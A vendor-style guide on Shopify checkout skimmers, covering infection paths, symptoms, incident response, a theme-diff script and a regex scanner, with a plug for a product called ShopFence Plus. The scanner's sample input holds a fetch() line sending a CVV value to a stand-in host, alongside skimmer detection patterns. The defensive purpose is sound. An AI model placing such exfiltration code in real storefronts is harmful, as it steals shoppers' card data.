
Shopify Malware: Detection, Removal & Prevention (2026 Guide)

Shopify malware is rarer than WordPress malware — but when it hits, it hits where it hurts most: your checkout. Shopify malware in 2026 almost always arrives through a compromised third-party app or theme, and the most common payload is a JavaScript skimmer that captures customer card details in real time. This guide covers how to detect Shopify malware, how to remove it, and the realistic prevention setup that catches new variants before they steal a single card.

How Shopify gets infected (the four real attack paths in 2026)

  • Compromised third-party app. A legitimate app developer gets breached. Their update pushes malicious JavaScript to every store that installed it. This is the #1 Shopify malware vector — and you have no visibility into it.
  • Malicious theme. A “free premium theme” downloaded from a third-party site contains hidden JavaScript that loads on every page. Theme marketplaces outside Shopify’s official store are full of these.
  • Staff-account takeover. A staff account with theme-edit permission gets phished, and the attacker pastes a skimmer directly into the theme.
  • Liquid injection via app permissions. An app you authorized to edit your theme gets compromised and modifies your theme files without you noticing.

In all four cases the attacker’s goal is the same: get JavaScript running on your checkout page so they can capture form fields (card number, CVV, address) and exfiltrate them to a remote server.

How to detect Shopify malware

Symptoms of an infected Shopify store fall into two buckets — visible and invisible. The invisible kind is far more dangerous.

Visible symptoms (catchable manually)

  • Customer complaints about “phantom charges” after checkout
  • Spike in chargebacks with no obvious order pattern
  • Unfamiliar redirects from your domain to external sites
  • Pop-up ads appearing on your storefront
  • Strange JavaScript files in your theme’s assets folder
  • Theme file modification timestamps that do not match your last edit

Invisible symptoms (require scanning)

  • JavaScript skimmer hidden inside a legitimate-looking script (obfuscated function names, base64-encoded URLs)
  • Third-party app silently adding tracking pixels that double as exfiltration channels
  • Outbound HTTP requests from your storefront to suspicious domains
  • Modified checkout templates (if you have access) with extra event listeners

Manual detection of the invisible kind is nearly impossible. You need automated theme scanning that compares your current theme files against a clean baseline and alerts on changes. This is exactly what ShopFence Plus does on every theme change.

How to remove Shopify malware (emergency response)

If you suspect or confirm a malware infection, work through this in order. Speed matters — every additional checkout completed while infected is a stolen card.

  1. Put your store on password protection immediately (Online Store → Preferences → Password page). This stops new checkouts while you investigate.
  2. Identify the entry point. Check your installed apps list for anything you do not recognize or did not install yourself. Uninstall suspicious apps.
  3. Audit staff access. Settings → Users and permissions. Remove any unfamiliar accounts. Force password reset on the rest. Enable 2FA on all remaining accounts.
  4. Diff your theme. Online Store → Themes → Actions → Edit code. Compare current theme against your last backup. Look for unfamiliar JavaScript, modified layout files, or new files in assets/.
  5. Restore from a clean theme backup. If you have one, restore it. If not, duplicate your current theme, strip out everything suspicious manually, then publish.
  6. Take your store live again and monitor checkouts for the next 24 hours.
  7. Notify affected customers if any checkouts occurred during the infection window. Refund proactively if necessary.
  8. File a report with Shopify Trust & Safety at shopify.com/security/report.
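
The theme diff in step 4 can be done by hashing both copies of the theme. The sketch below is an added example, not code from Shopify or ShopFence; it assumes the clean backup and the current theme are unpacked into two local directories, and the sample files in `demo()` are constructed.

```python
import hashlib
import tempfile
from pathlib import Path

def hash_tree(root):
    """Map each theme-relative file path to the SHA-256 of its contents."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def diff_theme(baseline_dir, current_dir):
    """Compare the current theme export against a known-clean backup."""
    base, cur = hash_tree(baseline_dir), hash_tree(current_dir)
    return {
        "added": sorted(set(cur) - set(base)),
        "removed": sorted(set(base) - set(cur)),
        "modified": sorted(f for f in set(base) & set(cur) if base[f] != cur[f]),
    }

def review_first(diff):
    """Step 4's priorities: new assets/ files, changed layout files, any new or changed .js."""
    hits = [f for f in diff["added"] if f.startswith("assets/") or f.endswith(".js")]
    hits += [f for f in diff["modified"] if f.startswith("layout/") or f.endswith(".js")]
    return sorted(set(hits))

def write_tree(root, files):
    for rel, text in files.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(text, encoding="utf-8")

def demo():
    """Run the diff on two constructed sample themes (not real store data)."""
    clean = {"layout/theme.liquid": "<html>{{ content_for_layout }}</html>",
             "assets/app.js": "console.log('cart');",
             "locales/en.default.json": "{}"}
    live = {**clean,
            "layout/theme.liquid": "<html>{{ content_for_layout }}<!-- edited --></html>",
            "assets/x.js": "/* file nobody on the team added */",
            "locales/en.default.json": '{"a": 1}'}
    with tempfile.TemporaryDirectory() as a, tempfile.TemporaryDirectory() as b:
        write_tree(a, clean)
        write_tree(b, live)
        diff = diff_theme(a, b)
    return diff, review_first(diff)

if __name__ == "__main__":
    diff, first = demo()
    print(diff)
    print("review first:", first)
```

A hash diff only shows which files changed; whether a change is malicious still depends on reading the file, and the result is only as trustworthy as the backup it is compared against.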

Common Shopify malware patterns (what to look for)

When auditing theme code, these are the suspicious patterns to grep for:

  • atob() and dynamic code execution patterns — base64-decoded code execution is a textbook skimmer pattern
  • Long hex or base64 strings inside script tags — encoded payload
  • Event listeners on checkout form fields — capturing card details as users type
  • Fetch / XHR to non-Shopify domains with credit_card, cvv, or card_number in the body
  • Modified analytics templates with extra document.write calls
  • External script tags from sketchy CDNs (anything not cdn.shopify.com, well-known analytics, or your installed apps)

If you find any of these in a file you did not modify, you have malware.
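
The patterns listed above, as a line-based scanner you can run over exported theme files. This is an added example, not Shopify's or ShopFence's code. The 80-character threshold, the listener event names and any allowed host other than cdn.shopify.com are assumptions, and the sample input is constructed.

```python
import re
from urllib.parse import urlparse

# Hosts you expect scripts from. Only cdn.shopify.com comes from the article;
# add your analytics and installed-app hosts (assumption: you know that list).
ALLOWED_HOSTS = {"cdn.shopify.com"}

RULES = {
    "atob": re.compile(r"\batob\s*\("),
    "dynamic_exec": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
    # 80+ base64-alphabet characters in a row; also matches long plain-hex strings.
    "long_encoded_string": re.compile(r"[A-Za-z0-9+/=]{80,}"),
    "field_listener": re.compile(
        r"addEventListener\s*\(\s*[\"'](?:input|keyup|keydown|change|blur)[\"']"),
    "card_field_in_request": re.compile(
        r"(?:fetch\s*\(|XMLHttpRequest|sendBeacon).*(?:credit_card|card_number|cvv)", re.I),
    "document_write": re.compile(r"document\.write\s*\("),
}
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)", re.I)

def scan_text(name, text):
    """Return (file, line number, rule) leads for manual review."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in RULES.items():
            if rx.search(line):
                findings.append((name, lineno, rule))
        for src in SCRIPT_SRC.findall(line):
            host = urlparse(src).hostname  # None for relative or Liquid-built URLs
            if host and host not in ALLOWED_HOSTS:
                findings.append((name, lineno, "external_script:" + host))
    return findings

# Constructed sample lines, one per rule; not taken from a real store.
SAMPLE = """<script src="https://cdn.shopify.com/s/files/1/theme.js"></script>
<script src="//static.example.net/t.js"></script>
<script>
  var u = atob("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQ=");
  cardInput.addEventListener("input", onType);
  fetch("https://metrics.example.net/c", {method: "POST", body: "cvv=" + v});
  document.getElementById("cart").addEventListener("click", openCart);
</script>"""

if __name__ == "__main__":
    for finding in scan_text("layout/theme.liquid", SAMPLE):
        print(*finding, sep="\t")
```

Matching is per line, so a payload split across lines or minified past recognition can slip through; pair it with a baseline diff so that any unexpected change gets read regardless of what it contains.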

Preventing Shopify malware (the realistic setup)

  1. 2FA on every admin and staff account. Stops account-takeover infections cold.
  2. Audit apps quarterly. Uninstall what you do not use. Each app is a code-injection vector — minimize them.
  3. Only install themes from Shopify’s official store. “Free premium theme” downloads from random sites are the #1 source of pre-infected stores.
  4. Install a real-time theme scanner. ShopFence Plus monitors theme files for changes and alerts you when something unexpected happens.
  5. Review staff permissions. Most staff do not need “theme edit” or “app install” — restrict those to the owner.
  6. Keep weekly theme backups. Duplicate your live theme every Friday. If you ever need to roll back, the clean copy is one click away.

Will Shopify warn me about malware?

Sometimes. Shopify monitors for known skimmer signatures and will notify you if their detection fires. But that detection is reactive — it usually only catches malware after it has been in the wild for days or weeks. Real-time scanning at the merchant level catches it the moment it appears, not after Shopify’s threat intelligence catches up.

Frequently asked questions

Can a Shopify store get malware?

Yes — almost always through a compromised third-party app, malicious theme from outside the official store, or a phished staff account. The platform itself is hardened, but anything you install on top of it expands the surface.

How do I scan my Shopify theme for malware?

Manual: open every theme file and grep for atob, base64 strings, and external script tags. Automated: install a Shopify security app with theme scanning like ShopFence Plus, which checks your theme against a clean baseline every time it changes.

What is a Shopify checkout skimmer?

JavaScript code injected into your storefront that reads customer payment fields (card number, CVV, billing address) as they type, and sends them to an attacker-controlled server. The customer’s order still completes normally — they only notice when a phantom charge appears later.

Will Shopify refund customers if my store was infected?

Shopify Protect covers eligible chargebacks, but not skimmer-stolen card use that happens outside Shopify. The card-issuing bank typically refunds the consumer; the financial responsibility for the breach may fall on the merchant under PCI rules. Notify customers proactively and offer to refund the order — it preserves the relationship and reduces reputational damage.

How do I tell if a Shopify app is safe to install?

Use only apps from the official Shopify App Store (filtered for verified developers), check the install count and reviews, look for an active maintenance pattern (recent updates), and read the requested permissions — be cautious of apps that ask for “modify theme code” or “manage all orders” if they do not need it.

Bottom line

Shopify malware is rare but expensive. Prevention is cheap: limit app installs, use 2FA, and run real-time theme scanning. ShopFence Plus includes theme scanning, malware alerts, and the bot detection that often catches the infection vector itself. For the full picture, see our complete 2026 Shopify security guide.